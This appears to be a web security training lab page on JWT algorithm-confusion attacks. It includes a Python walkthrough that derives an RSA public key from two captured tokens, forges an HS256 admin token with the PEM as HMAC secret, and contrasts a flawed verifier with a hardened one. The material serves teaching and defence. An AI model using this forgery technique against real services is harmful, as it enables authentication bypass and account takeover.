
Lab: JWT authentication bypass via algorithm confusion with no exposed key


This lab uses a JWT-based mechanism for handling sessions. It uses a robust RSA key pair to sign and verify tokens. However, due to implementation flaws, this mechanism is vulnerable to algorithm confusion attacks.

To solve the lab, first obtain the server's public key by deriving it from existing session tokens. Because the server takes the signing algorithm from the token header, you can change the header to HS256 and sign a modified session token with the PEM-encoded public key as the HMAC secret. Use that token to gain access to the admin panel at /admin, then delete the user carlos.

You can log in to your own account using the following credentials: wiener:peter


We recommend familiarizing yourself with how to work with JWTs in Burp Suite before attempting this lab.

We have also provided a simplified version of the jwt_forgery.py tool to help you. For details on how to use this, see Deriving public keys from existing tokens.
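The following is an added, self-contained example written for this page; it is not the lab's code and not the jwt_forgery.py tool. It walks the whole procedure in pure Python: it generates its own RSA key and issues two RS256 tokens (constructed stand-ins for the tokens you would capture in Burp), recovers the public key from those two signatures with the GCD technique, encodes it as an X.509 PEM, forges an HS256 token using that PEM as the HMAC secret, and then runs the token through a verifier with the lab's flaw and through a hardened one. The only assumption is the public exponent: e = 3 keeps s**e small enough for math.gcd without gmpy2, whereas real keys use 65537. Note that the HMAC secret must match the server's key bytes exactly (encoding, line wrapping, trailing newline), which is why the tool prints the key in more than one PEM format and you try each.

```python
"""Constructed example: JWT algorithm confusion with no exposed key, end to end, pure Python.
ASSUMPTION: e = 3 so that s**e stays small for math.gcd; real keys use e = 65537."""
import base64, hashlib, hmac, json, math, secrets

E = 3
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")  # DER prefix for SHA-256
def b64e(b): return base64.urlsafe_b64encode(b).rstrip(b"=").decode()
def b64d(s): return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

# ---- textbook RSA with PKCS#1 v1.5 signatures (what RS256 is) ----------------------------
def is_probable_prime(n, rounds=16):
    if n < 4 or n % 2 == 0: return n in (2, 3)
    d, r = n - 1, 0
    while d % 2 == 0: d, r = d // 2, r + 1
    for _ in range(rounds):  # Miller-Rabin
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1): continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1: break
        else: return False
    return True

def gen_prime(bits, e):  # top two bits set so p*q is exactly 2*bits long (derive_modulus relies on it)
    while True:
        p = secrets.randbits(bits) | (3 << (bits - 2)) | 1
        if math.gcd(e, p - 1) == 1 and is_probable_prime(p): return p

def gen_key(bits=512, e=E):
    p, q = gen_prime(bits // 2, e), gen_prime(bits // 2, e)
    return p * q, e, pow(e, -1, (p - 1) * (q - 1))  # n, e, d

def emsa_pkcs1_v15(msg, k):
    """EM = 00 01 FF..FF 00 || DigestInfo || SHA-256(msg), as a k-byte integer."""
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return int.from_bytes(b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t, "big")

def rs256_sign(signing_input, n, d):
    k = (n.bit_length() + 7) // 8
    return pow(emsa_pkcs1_v15(signing_input, k), d, n).to_bytes(k, "big")

def make_jwt(header, payload, sign):
    parts = [b64e(json.dumps(x, separators=(",", ":")).encode()) for x in (header, payload)]
    return ".".join(parts + [b64e(sign(".".join(parts).encode()))])

# ---- step 1: recover the public key from two captured RS256 tokens -----------------------
def derive_modulus(tokens, e=E):
    """Each token gives n | s**e - m, so the gcd of two such values is n times a small cofactor."""
    cands, k = [], 0
    for t in tokens:
        h, p, s = t.split(".")
        sig = b64d(s); k = len(sig)
        cands.append(pow(int.from_bytes(sig, "big"), e) - emsa_pkcs1_v15(f"{h}.{p}".encode(), k))
    n = math.gcd(*cands)
    for f in range(2, 1000):  # strip the cofactor: a k-byte signature means the real n fits in k bytes
        while n % f == 0 and n.bit_length() > 8 * k: n //= f
    return n

def der(tag, body):  # minimal DER TLV, lengths below 64 KiB
    ln = len(body)
    lb = bytes([ln]) if ln < 128 else (bytes([0x81, ln]) if ln < 256 else b"\x82" + ln.to_bytes(2, "big"))
    return bytes([tag]) + lb + body
def der_int(x): return der(0x02, x.to_bytes((x.bit_length() + 8) // 8, "big"))  # sign bit stays clear

def spki_pem(n, e):
    """X.509 SubjectPublicKeyInfo PEM. These exact bytes, newline included, become the HMAC secret."""
    alg_id = der(0x30, bytes.fromhex("06092a864886f70d010101") + b"\x05\x00")  # rsaEncryption, NULL
    spki = der(0x30, alg_id + der(0x03, b"\x00" + der(0x30, der_int(n) + der_int(e))))
    b = base64.b64encode(spki).decode()
    return "-----BEGIN PUBLIC KEY-----\n%s\n-----END PUBLIC KEY-----\n" % "\n".join(b[i:i + 64] for i in range(0, len(b), 64))

# ---- step 2: sign a modified token with HS256, secret = the PEM bytes --------------------
def forge_admin_token(tokens, subject="administrator"):
    pem = spki_pem(derive_modulus(tokens), E).encode()
    return make_jwt({"alg": "HS256", "typ": "JWT"}, {"sub": subject},
                    lambda si: hmac.new(pem, si, hashlib.sha256).digest())

# ---- server side: the flaw is trusting alg from the attacker-controlled header -----------
def verify(token, key, trust_header_alg):
    """key = {'n', 'e', 'pem'}; returns the payload or None. With trust_header_alg=True the HS256
    branch reuses the public-key PEM, which any client can derive, as the HMAC secret."""
    h, p, s = token.split(".")
    alg = json.loads(b64d(h))["alg"] if trust_header_alg else "RS256"  # fixed allow-list when hardened
    si, sig = f"{h}.{p}".encode(), b64d(s)
    ok = False
    if alg == "RS256":
        k = (key["n"].bit_length() + 7) // 8
        ok = len(sig) == k and pow(int.from_bytes(sig, "big"), key["e"], key["n"]) == emsa_pkcs1_v15(si, k)
    elif alg == "HS256":
        ok = hmac.compare_digest(hmac.new(key["pem"].encode(), si, hashlib.sha256).digest(), sig)
    return json.loads(b64d(p)) if ok else None

def demo():
    n, e, d = gen_key()
    key = {"n": n, "e": e, "pem": spki_pem(n, e)}
    captured = [make_jwt({"alg": "RS256", "typ": "JWT"}, {"sub": "wiener", "iat": i},
                         lambda si: rs256_sign(si, n, d)) for i in (1700000000, 1700000060)]
    forged = forge_admin_token(captured)
    return {"modulus_recovered": derive_modulus(captured) == n,
            "vulnerable": verify(forged, key, True), "hardened": verify(forged, key, False),
            "legit": verify(captured[0], key, True)}
```

Running demo() shows the recovered modulus equal to the server's, the flawed verifier returning the forged "administrator" payload, and the hardened verifier (algorithm fixed server-side, header ignored) rejecting the same token. Against the lab you replace gen_key and the constructed tokens with two real session tokens, feed the PEM to Burp's JWT Editor as a symmetric key, and change the header to HS256.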
